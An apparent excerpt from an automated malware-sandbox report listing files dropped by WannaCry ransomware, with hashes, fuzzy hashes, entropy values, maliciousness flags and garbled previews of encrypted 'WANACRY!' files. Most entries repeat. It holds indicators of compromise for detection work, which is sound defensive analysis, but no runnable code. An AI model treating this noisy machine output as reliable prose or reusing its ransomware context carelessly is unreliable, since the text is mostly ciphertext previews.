                                                                              Preview:WANACRY!....t.6.BM.L..S%A.{^Ny........{..=....0-....lr9c....;....*....l..YS...C[$.8..l....`......BA...f.K...aF.K.@ ...........:I:..6.....b....s../...\..p.....Q.6C....q.......#..4@v..-mS..k...M~..%....ft$.6&..L".......h.C..U*.$....Z...F=.{...F.w....7.L............p..8..b..,8R....7..........6p..Y9..!z....F.`8.J.*..../BH........O.c.>..?mtaH...D*.pD.?....@....B..0.X...a...........|;|.kf...."...t.[.;}..Q0K.:...#'k....3F...i.#..ba8.].4.....;Jf.H...I#...........O.H.H..L%.=..w....=.C..6b...v}3..x....3...7m...m.Vgq......H .g`./p...a.m.f...K....3...b.0F.TU..).@.......Y.^..2.QX.U..{..a.>#.._3....g\.e.i..y.f.Z..e"....x.<../>.X&I...{.>N..v.."..M'$i.......U.<~........Vi.{:...ny._.<.......f.S.U....Z.g..}....G.c..&..U....O!..\.P..=zl%..V.+=q.....J......5in..i.h...\.Q.v..m.j......TM.....;...tQFh..8rg.TH/......G.......H......#.....Y..WY.X.1.Y.b#ov..OO...q.....j(.<`.K..{....5E.T.^d...l... .q..ug...76w.v.*.bq,7D:..J.m.J..X$.1..I.....m.....+..*j...[.h
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):24856
                                                                              Entropy (8bit):7.992322343107616
                                                                              Encrypted:true
                                                                              SSDEEP:768:ejJCiFSbYyZ88QqLL8sD/nfybVM4ZsAMjyItdt:cXSbMe82KlZsAMjFXt
                                                                              MD5:AEB4E0C46048B0056617E1530FB7D662
                                                                              SHA1:BA62EC86586E099DDB7008683FBFF0EAF6FEC28F
                                                                              SHA-256:74CB8BD3B2B7F12FDEDE3CE44843F579853F27C1DCB7E39E5CE64DD6FC8CAA18
                                                                              SHA-512:2841C69AD910BA764A3A1CF0630F7354AC78E800A48C92F4A584ED0BA8C95ED40A31A64B96E10206C81B44E6784CDD7FFE6A7845E35F30EBF62830AEA7B96540
                                                                              Malicious:true
                                                                              Preview:WANACRY!....s.1.n.D....".|...7L.d.. .$!"...Y.jG.M.......0z...k....K?u...b.....V..FMeJ...r=.pc.5\..S..D...$...3..D...h...\.....]G...^.S.E_.C..T.m..[.....j.?.....r*8~........f...9......d..r..`!n?=.T.Q....L..l...;`r..U.?.)....(E.._z..`.X...*.X4].....$.(m......`.......1....L..#.T....Q..v]O...ot..c.f..s..E.@......w....5....%L...5..`..K.$....._s.a.?.....q..8..l..V..S_.... !.q.<7...E.Tu{.3..c....+.Km.`......auX.i..NQ..$..#5.....%......qh..B.R=.r.L....B-.0.....I..'A.F.r...V...a.+...I........N-.2D.}.E..Z..%.*.<....2uf. ....X@.<+..f..z.....c{.1B;....,E.6Lj0?\.U..H...?.!;...>..&.......}......).......pO>..F^.$3....k.....X#.G....t.a..9.H'..>......by.Fv....+T.e$.....K&k0.aB.*&.....9.~...!....+.W...!..=.h.mD|..J+.........8.PP........h..S~.*i..A..../.MH..HB.x......G..4.Iu.G...e.v..c].pe.^.fS~.oFg..S+#,..5^)i...]..n.K.S.sa.........3 .......S..L...j....y8A........$.D.m.c.........s.4$....d_]Z...N..I.H..p(k.8.sF.j....y......IlgJ.....`...N.8u.fcx.PT
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):24856
                                                                              Entropy (8bit):7.992322343107616
                                                                              Encrypted:true
                                                                              SSDEEP:768:ejJCiFSbYyZ88QqLL8sD/nfybVM4ZsAMjyItdt:cXSbMe82KlZsAMjFXt
                                                                              MD5:AEB4E0C46048B0056617E1530FB7D662
                                                                              SHA1:BA62EC86586E099DDB7008683FBFF0EAF6FEC28F
                                                                              SHA-256:74CB8BD3B2B7F12FDEDE3CE44843F579853F27C1DCB7E39E5CE64DD6FC8CAA18
                                                                              SHA-512:2841C69AD910BA764A3A1CF0630F7354AC78E800A48C92F4A584ED0BA8C95ED40A31A64B96E10206C81B44E6784CDD7FFE6A7845E35F30EBF62830AEA7B96540
                                                                              Malicious:true
                                                                              Preview:WANACRY!....s.1.n.D....".|...7L.d.. .$!"...Y.jG.M.......0z...k....K?u...b.....V..FMeJ...r=.pc.5\..S..D...$...3..D...h...\.....]G...^.S.E_.C..T.m..[.....j.?.....r*8~........f...9......d..r..`!n?=.T.Q....L..l...;`r..U.?.)....(E.._z..`.X...*.X4].....$.(m......`.......1....L..#.T....Q..v]O...ot..c.f..s..E.@......w....5....%L...5..`..K.$....._s.a.?.....q..8..l..V..S_.... !.q.<7...E.Tu{.3..c....+.Km.`......auX.i..NQ..$..#5.....%......qh..B.R=.r.L....B-.0.....I..'A.F.r...V...a.+...I........N-.2D.}.E..Z..%.*.<....2uf. ....X@.<+..f..z.....c{.1B;....,E.6Lj0?\.U..H...?.!;...>..&.......}......).......pO>..F^.$3....k.....X#.G....t.a..9.H'..>......by.Fv....+T.e$.....K&k0.aB.*&.....9.~...!....+.W...!..=.h.mD|..J+.........8.PP........h..S~.*i..A..../.MH..HB.x......G..4.Iu.G...e.v..c].pe.^.fS~.oFg..S+#,..5^)i...]..n.K.S.sa.........3 .......S..L...j....y8A........$.D.m.c.........s.4$....d_]Z...N..I.H..p(k.8.sF.j....y......IlgJ.....`...N.8u.fcx.PT
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):24856
                                                                              Entropy (8bit):7.993447351660452
                                                                              Encrypted:true
                                                                              SSDEEP:384:vaH2yVyBTpf3+8vIPGNZ8SbAFX0R4YEqpZGVYKuxHRsZbDfRrPiuU/P:vaHXV2TpuYIPTNlqpZGqx2b7Rj+/P
                                                                              MD5:E6700CE3334F0657079DA8BBE438BD2F
                                                                              SHA1:7BD1D26BFABBA5AB00CB9834BA7D2C6FA99131FF
                                                                              SHA-256:37DB07662FAB81ADDFB5963EE0FA4FF210AC336E6C7D17558A0CF4B441FB53DE
                                                                              SHA-512:DD9A93F4CAB0F528C68AD5BD04DF79E234CBD826C2BD871C10BC8FD961C5A94A47E72B704F13F218F948E73E92045E8B3AABAE6134CEB1BA9A94643475AEE4D2
                                                                              Malicious:true
                                                                              Preview:WANACRY!....=.X.OnF...d.Q\0..<..S...d~k......&...y.W>..RX..*..O..|}h"...9.oIWs..m1.. ..X.......rJ.F...g!.e.f.f(..[...s-I...<.;6.9WK..z..0......Zt..Y....q.v..,....L.v.}.....T...r$...+...B'..q?...Wk*&W+&.E,.......H.<...DA-eM......b..Y.A..(:..hwuX.:../.G....X+.....`.............pK....f.iM.iI..W.O9.f...:8_.BQ..1B\..E...kw.....)...&.~...B...%..@$d.:.0U.-..A....n..i..vLH..HAF...0....C{..I..V..cy..V^>.,.D...C@g.[....(....O...eM.....*.w.v..o[H!.6R.MKt.h.K..>..Vv....c.A..a.7....);....|..C9.K`..Hr...3....A..N?.K.x1......../..H.....&.4M$.pa.........&..'....(DI....z}x...k*....Q.'Z.HDz..O5G... .W....&.n0&W.g!I..A=...l.....S.vcc.V.v.~....D..P...%2pQ;.7.._":.Tg.Z.M4...w...\m. .Rv...|.).Cg.c...v.?.Of.g..=..E.e4.8.Z.j.v....6....m...w....n......L..n.....g....<...hxl./..k...>.E.Rc......a...M_.+=...p.%.[7..S...M*H#..ou.'W+....O.2..Oc...).b[-@....F.m..s..'K..Q..M.....n.....K.f07.6G./.=Y7..W.I......@..J.h%.+.....iB.CW.....T..F..C..~hO..$H....ZoM..Y...S..!>j>.l>o...,..f0
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):24856
                                                                              Entropy (8bit):7.993447351660452
                                                                              Encrypted:true
                                                                              SSDEEP:384:vaH2yVyBTpf3+8vIPGNZ8SbAFX0R4YEqpZGVYKuxHRsZbDfRrPiuU/P:vaHXV2TpuYIPTNlqpZGqx2b7Rj+/P
                                                                              MD5:E6700CE3334F0657079DA8BBE438BD2F
                                                                              SHA1:7BD1D26BFABBA5AB00CB9834BA7D2C6FA99131FF
                                                                              SHA-256:37DB07662FAB81ADDFB5963EE0FA4FF210AC336E6C7D17558A0CF4B441FB53DE
                                                                              SHA-512:DD9A93F4CAB0F528C68AD5BD04DF79E234CBD826C2BD871C10BC8FD961C5A94A47E72B704F13F218F948E73E92045E8B3AABAE6134CEB1BA9A94643475AEE4D2
                                                                              Malicious:true
                                                                              Preview:WANACRY!....=.X.OnF...d.Q\0..<..S...d~k......&...y.W>..RX..*..O..|}h"...9.oIWs..m1.. ..X.......rJ.F...g!.e.f.f(..[...s-I...<.;6.9WK..z..0......Zt..Y....q.v..,....L.v.}.....T...r$...+...B'..q?...Wk*&W+&.E,.......H.<...DA-eM......b..Y.A..(:..hwuX.:../.G....X+.....`.............pK....f.iM.iI..W.O9.f...:8_.BQ..1B\..E...kw.....)...&.~...B...%..@$d.:.0U.-..A....n..i..vLH..HAF...0....C{..I..V..cy..V^>.,.D...C@g.[....(....O...eM.....*.w.v..o[H!.6R.MKt.h.K..>..Vv....c.A..a.7....);....|..C9.K`..Hr...3....A..N?.K.x1......../..H.....&.4M$.pa.........&..'....(DI....z}x...k*....Q.'Z.HDz..O5G... .W....&.n0&W.g!I..A=...l.....S.vcc.V.v.~....D..P...%2pQ;.7.._":.Tg.Z.M4...w...\m. .Rv...|.).Cg.c...v.?.Of.g..=..E.e4.8.Z.j.v....6....m...w....n......L..n.....g....<...hxl./..k...>.E.Rc......a...M_.+=...p.%.[7..S...M*H#..ou.'W+....O.2..Oc...).b[-@....F.m..s..'K..Q..M.....n.....K.f07.6G./.=Y7..W.I......@..J.h%.+.....iB.CW.....T..F..C..~hO..$H....ZoM..Y...S..!>j>.l>o...,..f0
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):24856
                                                                              Entropy (8bit):7.992167869163938
                                                                              Encrypted:true
                                                                              SSDEEP:384:oenAGPwoEuh4lMELee3cuUJA/IHIIfaFS2coCjY7rJ9xpiXWKjeKE9sgiqXj+f3j:bUeCME7Q9f2coCj8hp243aMXjSzH
                                                                              MD5:FF1EBBA057DB8E1E52FCCD65B02457F3
                                                                              SHA1:716BDCED9E6237A0ABD92697DFDCA4233BDE7506
                                                                              SHA-256:06B154E60EE3AEFB6FB2E9CAF769BD8933D2D095F7E48FD56E10CDAC46229328
                                                                              SHA-512:CB7C303AC57CE0294C440CA217CFEE1955519FF1424BF5903EC47AD97F110854A5EB09196D143E71C30929484BAF57A0A5C38D213E5DCC42FDF9ED27B8E14495
                                                                              Malicious:true
                                                                              Preview:WANACRY!......8.....+M.(..6...G`..C.N\...<...%T...Ze...,]_..f.D....V/......Y.0?,.B.%...(..`=vb2..'.j.S&:nA..>.!J......G.2`.U8.e/..@.uF.j..:...g_[G..B..5....)...3..."./.......o.x..32-........Et.B.4n6..oK...n....\k..E>.u~...."..jk+.g..I...Z0.|@n..1....,..6R3H{.......`.........7^.......8...m'. .R......J.y...2......x.MLI......yw.?}.M.........XD.P..T..]r...%....8@.&...{.x0. .9.......[..$L...a*.6../..hg!`(_Z:..c..<@....O.&MRdR.`..*.MX)4..YL.T.2.*....%..#....P.......t.I..p.?..s..<.&..o..N..d|+j.`...r.ef,...a..).,....%s.".T..-T.Y.Xs.(5.H..j./]...3.r..+...'N..I&.X.?b..].P....".s.Ip....@s.x4..g....}.I.g}+....O..@..1n....#.0;j.{.O+#{.T{..J[....]..$]..>,!...|.!1>H.E...I.r.E.._.....f..{..F...).5.{ -d..M.....<.]U.[....Q!...N....&lQ.>.......s...$..&$..\.9....2..Z=a9........T]J..y>'..Xb....tx9.z.#.(..5.)..U...k...P....v5.;...bc.J.N.M...y.7..K`....A..H0...iIA)...r'....Z...R].>../..f.d..:..[...G%.......#9.....m.......`T.!p5...~......(E1....oQ.#.....7..G..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):24856
                                                                              Entropy (8bit):7.992167869163938
                                                                              Encrypted:true
                                                                              SSDEEP:384:oenAGPwoEuh4lMELee3cuUJA/IHIIfaFS2coCjY7rJ9xpiXWKjeKE9sgiqXj+f3j:bUeCME7Q9f2coCj8hp243aMXjSzH
                                                                              MD5:FF1EBBA057DB8E1E52FCCD65B02457F3
                                                                              SHA1:716BDCED9E6237A0ABD92697DFDCA4233BDE7506
                                                                              SHA-256:06B154E60EE3AEFB6FB2E9CAF769BD8933D2D095F7E48FD56E10CDAC46229328
                                                                              SHA-512:CB7C303AC57CE0294C440CA217CFEE1955519FF1424BF5903EC47AD97F110854A5EB09196D143E71C30929484BAF57A0A5C38D213E5DCC42FDF9ED27B8E14495
                                                                              Malicious:true
                                                                              Preview:WANACRY!......8.....+M.(..6...G`..C.N\...<...%T...Ze...,]_..f.D....V/......Y.0?,.B.%...(..`=vb2..'.j.S&:nA..>.!J......G.2`.U8.e/..@.uF.j..:...g_[G..B..5....)...3..."./.......o.x..32-........Et.B.4n6..oK...n....\k..E>.u~...."..jk+.g..I...Z0.|@n..1....,..6R3H{.......`.........7^.......8...m'. .R......J.y...2......x.MLI......yw.?}.M.........XD.P..T..]r...%....8@.&...{.x0. .9.......[..$L...a*.6../..hg!`(_Z:..c..<@....O.&MRdR.`..*.MX)4..YL.T.2.*....%..#....P.......t.I..p.?..s..<.&..o..N..d|+j.`...r.ef,...a..).,....%s.".T..-T.Y.Xs.(5.H..j./]...3.r..+...'N..I&.X.?b..].P....".s.Ip....@s.x4..g....}.I.g}+....O..@..1n....#.0;j.{.O+#{.T{..J[....]..$]..>,!...|.!1>H.E...I.r.E.._.....f..{..F...).5.{ -d..M.....<.]U.[....Q!...N....&lQ.>.......s...$..&$..\.9....2..Z=a9........T]J..y>'..Xb....tx9.z.#.(..5.)..U...k...P....v5.;...bc.J.N.M...y.7..K`....A..H0...iIA)...r'....Z...R].>../..f.d..:..[...G%.......#9.....m.......`T.!p5...~......(E1....oQ.#.....7..G..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4376
                                                                              Entropy (8bit):7.959091385918647
                                                                              Encrypted:false
                                                                              SSDEEP:96:oongCGGm2dcY02cLsVHGqZsnwfytBmA9wSKoobI5ZfT9u03QzE:TgCdEY0xgHZswfYbexIvfT9umQg
                                                                              MD5:E76A66DEBEEF5EB040772B89BB44C7BD
                                                                              SHA1:2915C28C4B5F4E2CC509340FDF80E276D76FB653
                                                                              SHA-256:17E7EFC38CA13E868B3BB1306D8B6E14B1DE63E5F2CB98DB97C248C6FE6A61F1
                                                                              SHA-512:0A20B849937DC25FA4421DC13CAF902FEE9DED773B41A110D8714B2ACCC583011927586B41DBACD0E20E22B194BF113AED39B14165A7087DAD624E31AEF469F3
                                                                              Malicious:false
                                                                              Preview:WANACRY!....6.....r.jI.....W..z.....g.8.MM.#...fK.y.^.W...>..I:.pT..z...7Z.i..n..o.2BM#....u5J.mgiG.....'o0/-|.,..&q.R.S.....-....S!Q...3..mz...."..../..q.9.....>.r.u...Mk..`.......T..cG...y._. .f.>MZ........e.{$...W...`q..9.#g.5.h...R..W"C.+^..........I<...0 ..............N.51...Y.xi..DRx)k..w...]H....Rt..R..i..ci...z.{..oW.t...f..<m./.n.,...#.XX7.K..U~.Z.3L.%._.M....)Q. .\^....JF.!..1*.c..G..$.<......[..n.U..5<.@.....-.....*...:..@K^.P.dD.h.O$...NI@.....P.Uz.._...5.dm.7D......>_E........M..&6E.j.p..(E..t..f..m...U...LC.lCD.cR...M.../..u.....Y....n..&......[...<...EC1....Eq...Y..,"..........g./..W.....o>.........m...,6C8=.=.[{$............lbgY./.#..~...8.c.pIG..!..l{...!..3.uH..-g.A`.".n^.. ...a);|......)...g.k........m.....y.....^L.>.l..j..:.........0."..q"B.{..C..[.t.....V.<.....MlJBZ..}c.*...........M8.n9..` KH.(....TX.c.>O.....|..D..(i]...gu.......8s'c'.8...!..D.P.I."....X..cZ....c..6P.b..Y.......J......a.M.^5b....B...Om?.-...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4376
                                                                              Entropy (8bit):7.959091385918647
                                                                              Encrypted:false
                                                                              SSDEEP:96:oongCGGm2dcY02cLsVHGqZsnwfytBmA9wSKoobI5ZfT9u03QzE:TgCdEY0xgHZswfYbexIvfT9umQg
                                                                              MD5:E76A66DEBEEF5EB040772B89BB44C7BD
                                                                              SHA1:2915C28C4B5F4E2CC509340FDF80E276D76FB653
                                                                              SHA-256:17E7EFC38CA13E868B3BB1306D8B6E14B1DE63E5F2CB98DB97C248C6FE6A61F1
                                                                              SHA-512:0A20B849937DC25FA4421DC13CAF902FEE9DED773B41A110D8714B2ACCC583011927586B41DBACD0E20E22B194BF113AED39B14165A7087DAD624E31AEF469F3
                                                                              Malicious:false
                                                                              Preview:WANACRY!....6.....r.jI.....W..z.....g.8.MM.#...fK.y.^.W...>..I:.pT..z...7Z.i..n..o.2BM#....u5J.mgiG.....'o0/-|.,..&q.R.S.....-....S!Q...3..mz...."..../..q.9.....>.r.u...Mk..`.......T..cG...y._. .f.>MZ........e.{$...W...`q..9.#g.5.h...R..W"C.+^..........I<...0 ..............N.51...Y.xi..DRx)k..w...]H....Rt..R..i..ci...z.{..oW.t...f..<m./.n.,...#.XX7.K..U~.Z.3L.%._.M....)Q. .\^....JF.!..1*.c..G..$.<......[..n.U..5<.@.....-.....*...:..@K^.P.dD.h.O$...NI@.....P.Uz.._...5.dm.7D......>_E........M..&6E.j.p..(E..t..f..m...U...LC.lCD.cR...M.../..u.....Y....n..&......[...<...EC1....Eq...Y..,"..........g./..W.....o>.........m...,6C8=.=.[{$............lbgY./.#..~...8.c.pIG..!..l{...!..3.uH..-g.A`.".n^.. ...a);|......)...g.k........m.....y.....^L.>.l..j..:.........0."..q"B.{..C..[.t.....V.<.....MlJBZ..}c.*...........M8.n9..` KH.(....TX.c.>O.....|..D..(i]...gu.......8s'c'.8...!..D.P.I."....X..cZ....c..6P.b..Y.......J......a.M.^5b....B...Om?.-...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):16664
                                                                              Entropy (8bit):7.990299858067976
                                                                              Encrypted:true
                                                                              SSDEEP:384:QxOnq0qRIWpLjAzwvVUVD3uOhO51spydb2x0:brqeWRkzwU+T58yv
                                                                              MD5:5305F45B428C3942574FF9E62164CFD4
                                                                              SHA1:D2D73D8EFD363432B615FD2813CAF3D3B6597544
                                                                              SHA-256:6AD373AD9A474774390824D30D8E7E921BE60101A440B85538FB4BF2AF2CFDBC
                                                                              SHA-512:E98C9C8C061CA3FAE61D5505924A723181B72B3413F0C5D92B9382D6AA7FDB2BE1BA9EC6EA87C998708B85D60E0A61AD5C2F0D1E863FB66D05960BC563548202
                                                                              Malicious:true
                                                                              Preview:WANACRY!....o}.Z7l.B....w...^f..[...a...2.hI.;~'+.c.....f.9...{#'.....y94.n...|.:.q.._.d...G........WO.>.E`........E..b.GK.]*..H.fV.C..#/...%.......C.2.5e...,.,...el.<~t\..j.]6..."g..:XD**....+..y..q.........c..EW...|..J..G..).0..q3.Zba.}7]i."O..K.e.....u.....@........q.?.K.Q){i,..%....S...E..{.OzD..(..L.W..%.P.#...4.o....a...*....=..@.U.y.-&..r..@7.Zf.k..........'.q...X.=.B..H.i.H[=..v...VJW..BfR.F.....JC..s..@!...%....R...C........yw...).?+....0..u..|...H<...=.@.@.L.....=..Y.#...Q.W........(.,...Q...*.E.6.?s..Z...!-....B._.h^..{V...S.a/.. f...bD.].h\"......9f/..|]6.\..........L-...nc..BT-k_jW.8..........V..0..l..c....gE.R....n.h....&.."|*.X..c~.{..>w.S..&.~t..{!....p...:.....io......Z..Q.....19Y.\.o..$.0.@@]?6...>}...u8..[.......w..g.y.~v"..B........b.Z..............[.QN..n..F....u...g`M........~.b.....Y..f..&....!$.f...5.)..H....3......-......W.x.6E)..f..:0[....@......iH..z.KL4..F....NN.B..u.J...X.K..+1/[4;...$...+.l.T1.W.o!..Cv...8.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):16664
                                                                              Entropy (8bit):7.990299858067976
                                                                              Encrypted:true
                                                                              SSDEEP:384:QxOnq0qRIWpLjAzwvVUVD3uOhO51spydb2x0:brqeWRkzwU+T58yv
                                                                              MD5:5305F45B428C3942574FF9E62164CFD4
                                                                              SHA1:D2D73D8EFD363432B615FD2813CAF3D3B6597544
                                                                              SHA-256:6AD373AD9A474774390824D30D8E7E921BE60101A440B85538FB4BF2AF2CFDBC
                                                                              SHA-512:E98C9C8C061CA3FAE61D5505924A723181B72B3413F0C5D92B9382D6AA7FDB2BE1BA9EC6EA87C998708B85D60E0A61AD5C2F0D1E863FB66D05960BC563548202
                                                                              Malicious:true
                                                                              Preview:WANACRY!....o}.Z7l.B....w...^f..[...a...2.hI.;~'+.c.....f.9...{#'.....y94.n...|.:.q.._.d...G........WO.>.E`........E..b.GK.]*..H.fV.C..#/...%.......C.2.5e...,.,...el.<~t\..j.]6..."g..:XD**....+..y..q.........c..EW...|..J..G..).0..q3.Zba.}7]i."O..K.e.....u.....@........q.?.K.Q){i,..%....S...E..{.OzD..(..L.W..%.P.#...4.o....a...*....=..@.U.y.-&..r..@7.Zf.k..........'.q...X.=.B..H.i.H[=..v...VJW..BfR.F.....JC..s..@!...%....R...C........yw...).?+....0..u..|...H<...=.@.@.L.....=..Y.#...Q.W........(.,...Q...*.E.6.?s..Z...!-....B._.h^..{V...S.a/.. f...bD.].h\"......9f/..|]6.\..........L-...nc..BT-k_jW.8..........V..0..l..c....gE.R....n.h....&.."|*.X..c~.{..>w.S..&.~t..{!....p...:.....io......Z..Q.....19Y.\.o..$.0.@@]?6...>}...u8..[.......w..g.y.~v"..B........b.Z..............[.QN..n..F....u...g`M........~.b.....Y..f..&....!$.f...5.)..H....3......-......W.x.6E)..f..:0[....@......iH..z.KL4..F....NN.B..u.J...X.K..+1/[4;...$...+.l.T1.W.o!..Cv...8.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):16664
                                                                              Entropy (8bit):7.989478187378559
                                                                              Encrypted:false
                                                                              SSDEEP:384:puLwYk85Hs8VVXOfctDruN/vx3gYJsX8HUazMYMr0a4KHB:pug8tLte/GYJa80ZrjFHB
                                                                              MD5:C91FE4B1EF4C7358961BE80C9225999E
                                                                              SHA1:D684B7ED68148F32D83BE57AD51598F0E52BEF03
                                                                              SHA-256:EF0B673D6E4C331B3F9652D3BC29C59BFC6CDD866C55137A1CE9EE77428E3E0F
                                                                              SHA-512:AED4BC3CEE117A410520D8135701E9F0444EB573E5AB75F569075F1F631D39BA7A7F4AB165A4D20DF249B1F7F08608D3CFE4B7D79BF4204CC894D0C8BD3E8544
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......-.p....r.m.UH+w........ .AQ..1@Y.5...[...l...z.......p .N}B....Q.....p......9..+q.....Q..gj.*......p..a...l.Ta0.o.u=BX.3j.#~...e8S..A, :..*f.d-....f[.aU.?Q...1.-..x.?.=.cj...nbNz..P$..3G...z..|HpzX......t.5..'`.L.~.~.p?..-..0.4.../F"..............@......Z...I..i.l....>zi{)..x.8.*-.|.s..)^..%..".......H.....GL...'.B..].e.c...k.......z-....p.......S..l?.,..,.).......R].,k......Y.A"..p...,.Nut./Yi...!}..QE...%......|../%;.k......E..Q..D..^...jj...K....i..U..K.M`|...%E>i 3t.....8....8....F.2]..{,/.)..7....2.;.*e..3.#OF..a.Um._+V.z..N...8.v....KZc.{.._.I.V..2F....7..Y.qR.S..:.`RF...5.~.,.a.:loa..1C0.i..y\..4.........({....4{.....G.s3.u..b....h.....n.^|vpY.....8.Yv...j...k\...e9..yugP..&..j.N.m...v.P.3u....E.A.B..@..U^p.`pP.?.~.w6..Y.....p..M.Fs..X._....p+.}.6..<..n 3..NFZ.'bG..+..XPn....K<`..'i.....D.Od.Z)../[..t.M..w8....o.S/.c|...ad...O.R*?'......M........]s.%...M>3.....e05E..r.......Wd...t.'kz....x.C.B.d.l.~.....i.."H.l...Q.D..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):16664
                                                                              Entropy (8bit):7.989478187378559
                                                                              Encrypted:false
                                                                              SSDEEP:384:puLwYk85Hs8VVXOfctDruN/vx3gYJsX8HUazMYMr0a4KHB:pug8tLte/GYJa80ZrjFHB
                                                                              MD5:C91FE4B1EF4C7358961BE80C9225999E
                                                                              SHA1:D684B7ED68148F32D83BE57AD51598F0E52BEF03
                                                                              SHA-256:EF0B673D6E4C331B3F9652D3BC29C59BFC6CDD866C55137A1CE9EE77428E3E0F
                                                                              SHA-512:AED4BC3CEE117A410520D8135701E9F0444EB573E5AB75F569075F1F631D39BA7A7F4AB165A4D20DF249B1F7F08608D3CFE4B7D79BF4204CC894D0C8BD3E8544
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......-.p....r.m.UH+w........ .AQ..1@Y.5...[...l...z.......p .N}B....Q.....p......9..+q.....Q..gj.*......p..a...l.Ta0.o.u=BX.3j.#~...e8S..A, :..*f.d-....f[.aU.?Q...1.-..x.?.=.cj...nbNz..P$..3G...z..|HpzX......t.5..'`.L.~.~.p?..-..0.4.../F"..............@......Z...I..i.l....>zi{)..x.8.*-.|.s..)^..%..".......H.....GL...'.B..].e.c...k.......z-....p.......S..l?.,..,.).......R].,k......Y.A"..p...,.Nut./Yi...!}..QE...%......|../%;.k......E..Q..D..^...jj...K....i..U..K.M`|...%E>i 3t.....8....8....F.2]..{,/.)..7....2.;.*e..3.#OF..a.Um._+V.z..N...8.v....KZc.{.._.I.V..2F....7..Y.qR.S..:.`RF...5.~.,.a.:loa..1C0.i..y\..4.........({....4{.....G.s3.u..b....h.....n.^|vpY.....8.Yv...j...k\...e9..yugP..&..j.N.m...v.P.3u....E.A.B..@..U^p.`pP.?.~.w6..Y.....p..M.Fs..X._....p+.}.6..<..n 3..NFZ.'bG..+..XPn....K<`..'i.....D.Od.Z)../[..t.M..w8....o.S/.c|...ad...O.R*?'......M........]s.%...M>3.....e05E..r.......Wd...t.'kz....x.C.B.d.l.~.....i.."H.l...Q.D..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):424136
                                                                              Entropy (8bit):7.999469360593305
                                                                              Encrypted:true
                                                                              SSDEEP:12288:Bbs/hfh431bcTyOVqEafyLdL4v3S3EJqMXOHSEeRXQN:ps/n8bcm+qEsch4fo+XOHSEuK
                                                                              MD5:2B23A7F518D0E9662175B642C0E65D6A
                                                                              SHA1:8625C0EA4441DBC8F587215F1EA60DFCFE334431
                                                                              SHA-256:271D92525A15BB39B8F71767E375E14F26604535F4AD4CECE291F3B4D6F2E8CA
                                                                              SHA-512:F794276DA8EFD4C3347B196E84DB8194915BD6689A141AD247E8DB322597691B764DBB7500242D93A7C1423621D2A2606D81CB22173498190A128F068C100C63
                                                                              Malicious:true
                                                                              Preview:WANACRY!......6.GM.3........Q...~D...;..M...I$.l=Sh=qP.y.;.!.A...'..T.yW..3kW...;_....Ti..\!..c..n...>ljBW..\....'.u..V......o.c...MO~&...t.J9.#.j.....g..AZ!.......,XP.".(...l....^-......9............@..".`.?.ZP.5..,.... (.`...2M..y.......ZV.9.JP....a.....w.........).N...m...;.$..%.4..KJMI..V.l..v.d../....%1.X6.(.&3.'.d....;..N..B..A..b..u....B.i...~.I.t.V.iK..&....r..P.i...L..@....I..PX.....a....o..H....'..v.xf....~.0..cm..6.]..e.|.1D.H...t\..].D.k....!.C.2..}$Ti.....]...bP.&f.....B..7.....@...r.P.....%.z.p..W.*`1.).ek..G..R~q................^.).%.. ...4...35.&.......n.CI...j.#........T..n..^_....&9^.6.........Yy|...... %%...,.#............3<....1...i.S.i..-....uja8..o.....e<..]......C.Ey...|7.Q.....^T|..9-9..Nd.j..svB..t...q;?....<..>)7....^F.Q.(.+J0 .|..G......p\...e\.r~...|..)S..8...2..[0..$S..Sd.2..h..f..d...W..p...!..Q|.>.eX.........d#..J.f.9.6.2......l7.^Q.{2....*."..y.2....... ..q.$.Z..3..J.]...o.n.....".....[@,.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):424136
                                                                              Entropy (8bit):7.999469360593305
                                                                              Encrypted:true
                                                                              SSDEEP:12288:Bbs/hfh431bcTyOVqEafyLdL4v3S3EJqMXOHSEeRXQN:ps/n8bcm+qEsch4fo+XOHSEuK
                                                                              MD5:2B23A7F518D0E9662175B642C0E65D6A
                                                                              SHA1:8625C0EA4441DBC8F587215F1EA60DFCFE334431
                                                                              SHA-256:271D92525A15BB39B8F71767E375E14F26604535F4AD4CECE291F3B4D6F2E8CA
                                                                              SHA-512:F794276DA8EFD4C3347B196E84DB8194915BD6689A141AD247E8DB322597691B764DBB7500242D93A7C1423621D2A2606D81CB22173498190A128F068C100C63
                                                                              Malicious:true
